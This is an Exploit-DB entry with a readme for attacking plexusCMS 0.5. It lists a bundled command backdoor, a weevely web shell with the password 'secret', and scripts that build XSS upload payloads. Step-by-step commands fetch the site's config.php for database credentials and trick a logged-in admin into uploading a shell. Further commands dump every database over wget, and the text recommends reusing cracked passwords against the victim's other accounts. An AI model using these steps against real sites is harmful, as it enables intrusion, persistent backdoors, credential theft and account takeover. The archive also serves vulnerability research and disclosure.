plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak

EDB-ID:

32618

CVE:





Platform:

PHP

Date:

2014-03-31


# Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit
# Google Dork: allinurl: plx-storage
# Date: 22.02.2013
# Exploit Author: neglomaniac
# Vendor Homepage: http://plexus-cms.org/
# Version: 0.5

---

FILES

backdoor.php	simple commend execute backdoor
commands.txt	list of useful commands for owning remote box
generator.py	create important files with given parameters
phpinfo.php	simple phpinfo call for testing
plexus05.tgz	original plexus source code for auditing
postit.py	send evil POST Request for file upload
readme.txt	nothing else than this file
request.txt	evil POST request template for postit.py
weevely.php	weevely shell with password:secret
weevely.tgz	weevely stealth web backdoor client and generator

---

EXPLOITATION

Get database credentials with wget http://RHOST/plx-file/config.php

Try to log in with phpmyadmin and dump the database for password
cracking. If you can crack the password you can upload php files
with new image and new file. You can launch your php backdoors
inside http://plexushost/plx-storage/files/ or plx-storage/images/

If you do not have access to the database in some way you can
upload files with XSS and Social Engineering.

Set up a server with php support and python installed on it. Copy
all this files to a location where you can write to it. Launch

python generator.py plexushost 80 http://yourserver/scripts/ weevely.php

If you see: plximage.php, plximage.js, plximage.xss generated!!!
all files are generated for exploitation.

plexushost is the victim webserver where plexus is installed
port is the standard webserver port

http://yourserver/scripts/ is the location of exploit files. Do not forget
the slash at the end!!!

weevely.php ist the file uploaded at http://victimhost/plx-storage/files/

Get url from plximage.xss obfuscate, iframe and/or shorten it. Put it into
an email, on a webpage or wherever you want.

Socialengineer your victim to open this url. If your victim is logged in
you get your backdoor at: http://victimhost/plx-storage/files/ Else you
need to socialengineer your victim to log in. After the victim logs in you
get your backdoor at files directory.

Connect to your backdoor with weevely and password your password (secret)
python weevely.py http://victimhost/plx-storage/files/yourfile.php secret

Dumpt the whole database with previous collected credential and download ist
mysqldump -f -r plxinfo.txt -uYOURUSER -pYOURPASS --all-databases
wget http://RHOST/plx-storage/files/plxinfo.txt

Crack password and use it for your next hacking attempts against your victim.
For example try this password for root or other users, other mysql databases,
mysql root, facebook/twitter accounts and so on.

---


Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32618.tgz